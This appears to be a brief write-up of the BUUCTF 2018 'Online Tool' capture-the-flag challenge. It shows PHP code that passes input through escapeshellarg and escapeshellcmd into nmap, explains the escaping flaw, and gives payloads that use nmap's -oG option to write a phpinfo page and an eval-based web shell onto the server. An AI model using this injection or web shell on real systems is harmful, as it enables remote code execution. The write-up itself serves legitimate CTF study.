https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
Key points:
Because escapeshellarg() and escapeshellcmd() are applied one after the other, the input is escaped twice, so a single quote in the input closes the quoting and anything after it is passed to the command as extra arguments; Nmap's -oG parameter is then used to write a shell.
?host='<?php phpinfo();?> -oG 1.php '
?host='<?php eval($_POST["cmd"]);?> -oG shell.php '
PS: I have a question here. None of the write-ups I have seen online seem to explain clearly why, in ?host='<?php eval($_POST["cmd"]);?> -oG shell.php '
there has to be a space before the final single quote. I don't quite understand it; if any master knows, please point it out in the comments. Thanks.